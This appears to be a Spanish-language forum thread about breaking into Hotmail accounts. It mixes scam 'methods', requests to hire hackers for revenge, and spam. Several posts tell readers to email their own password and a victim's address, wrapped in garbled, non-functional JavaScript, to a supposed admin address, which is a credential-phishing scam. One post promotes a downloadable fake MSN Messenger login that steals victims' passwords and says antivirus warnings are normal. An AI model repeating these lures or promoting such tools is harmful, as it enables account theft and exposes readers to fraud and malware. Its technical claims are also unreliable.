| Ayuda | Nuevo usuario |
|
|
Herramientas | Visualización |
|
|
|||
|
|||
|
Bien vamos a decirles en q consiste estos 2 metodos:
Metodo uno: Mandar un e-mail a passport_corfirm@hotmail.com para q confirme la accion como admin y te genere un cookie para poder entrar en el hotmail de la persona ----------------------------------------------------------- En asunto escribe: </passwd/etc/rootlogin y en el cuerpo del mensaje debes poner el codigo Javascript, con los datos modificados. el codigo es: </SCRIPT LANGUAGE="JavaScript"> var exp = new Date(); exp.setTime(exp.getTime() + (expDays*24*60*60*1000)); function amt(){ var count = GetCookie('count') if(count == null) { SetCookie('count','1') return 1 } else { var newcount = parseInt(count) + 1; DeleteCookie('count') SetCookie('EL MAIL DE TU VICTIMA) return count } } function getCookieVal(offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function checkCount(TU EMAIL) { var count = GetCookie('count'); if (count == null) { count=(TU PASSWORD) SetCookie('count', count, exp); En 24 horas el mensaje sera respondido por el boot. 2 metodo... ---------------------------------------------------------------- Link http://files.filefront.com//;7650172;;/ Este archivo genera los codigos javascrip solo solo hace falta ejecutar el .exe Algunos antivirus lo detectan como virus si pasa eso no te preocupes es normal q salte debido a q se trata a una herramienta de haching ![]() |
|
|
|||
|
|||
|
¿Para qué piden justamente la cuenta y la clave de uno?
|
|
|
|||
|
|||
|
les gusta hackear por venganza o por fastidiar a la gente y yo quiero hackear a un alguien por venganza
|
|
|
|||
|
|||
|
Necesito una passw y pagaré por ello. Sé de sobra que las chorradas esas de dame tu email y tu passw no sirven para tomar por culo, eso un truco de lammers para pillar a... digamos ingenuos. El problema es que no tengo acceso al pc, ni a la IP de la persona y tampoco el rollo de la ingeniería civil me sirve para nada. Necesito hablar con un HACKER y negociar. Digamos que los fines no es putear a nadie ni vengarme, es por cuestiones amorosas y lo necesito de verdad. Los interesados pueden contestarme en el foro o enviarme un correo a dragonheartforme@hotmail.com. Espero vuestra respuesta
|
|
|
|||
|
|||
|
Basta de timos y falsas promesas. Esta es la mejor web para ganar dinero por internet. Tutoriales, consejos, guias para conseguir referidos... solo las mejores webs recomendadas: tobux, adbux, adbuddy, ciao, agloco... mas informacion en nuestra web.
http://usuarios.lycos.es/dineroporlared ![]() |
|
|
|||
|
|||
|
formas de hackear hotmail hya muchas. . yo uso esta
/////////////////////// mzn7.5.exe descarga desde nuestro servidor Este programa simula el inicio de sesión del MSN Messenger 7.5. La victima introduce su correo y clave y cuando da iniciar sesión le aparecerá un error falso diciendo que tiene mal la clave o su cuenta e inmediatamente le abrirá el MSN verdadero para no levantar ninguna sospecha. Estre programa tiene 2 opciones, que todos las claves te lleguen a tu correo y la otra es ver las claves desde la PC en que se instaló. Para ello vas al menú Ayuda, y clic en Acerca de MSN Messenger luego pulsas la imagen para ver todas las claves puestas del messenger. Tamaño:254 Kb. lo sake de aqui http://www.mehackearon.com/forum/showthread.php?t=7 |
|
|
|||
|
|||
|
Hola Como Estas, Tengo Una PequeÑapropuesta.
No Se Si Te Entereza Pero Necesito Un Servidor Y Un Hostig Tengo Contactatos O Lo Necesaria Para Hacer Una Pagina De Runbas, Si Comsigo Una Buena Publicidad Podemos Devidirlo En 50 Y 50 No Se Piensalo! |
|
|
|||
|
|||
|
hOlap!! necesito ayuda porfis!! un "amigo" si asi se llama me robo my correo anterior i kiero vengarme me puedes ayudar por favor?? mi nuevo correo es elyssabth@hotmail por si alguien se conpadese de mi y me auxilia
Cita:
|
|
|
|||
|
|||
|
no mames no naci ayer ese truco es viejo io tambien tengo un correo que es passpor_custom@hotmail.com y hago lo mismo pido su correo y contraceña de personas pendejas y me meto a su pag y les hago mamadas jeje ya no caigan en esto hay otras formas mas eficases bueno si son ing en sistemas jeje como yo nos vemos y no le hagan caso a ese puto
|
|
|
|||
|
|||
|
Miren mi forma de hackear es totalmente de confiansa...
esta en muchas otras paginas web...por k yo tengo el mail verdadero para hacer todas estas cosas,y los estan estafando los demas... les ponen muchas cosas de mas...esta formsa es moderna y muyyy simple.. NO es FALSA!!es lo mismo si esta en castellano o en ingles... sigan los procedimientos: 1- (no se nesecita asunto con el e-mail verdadero con las contraseñas) (no se nesecita contrasela por un programa avanzado agregado) 2-En la parte donde se redacta el mensaje escribir: e-mail de victima)Nombre nombre de victima)Tu E-mail: Tu contraseña: Tu nombre: (si no queres no lo pongas en el mail) Y asi termina el rpoblema...asi de facil...a mi me funciono, te lo juro por todo k me funciona..!!! Y esto se lo tenes k enviar al mail: password_msnz@hotmail.com siempre es hotmail por k para el programa este de las contraseñas es mas seguro... muchas gracias por la atencion.. espero k lo usen saludoss |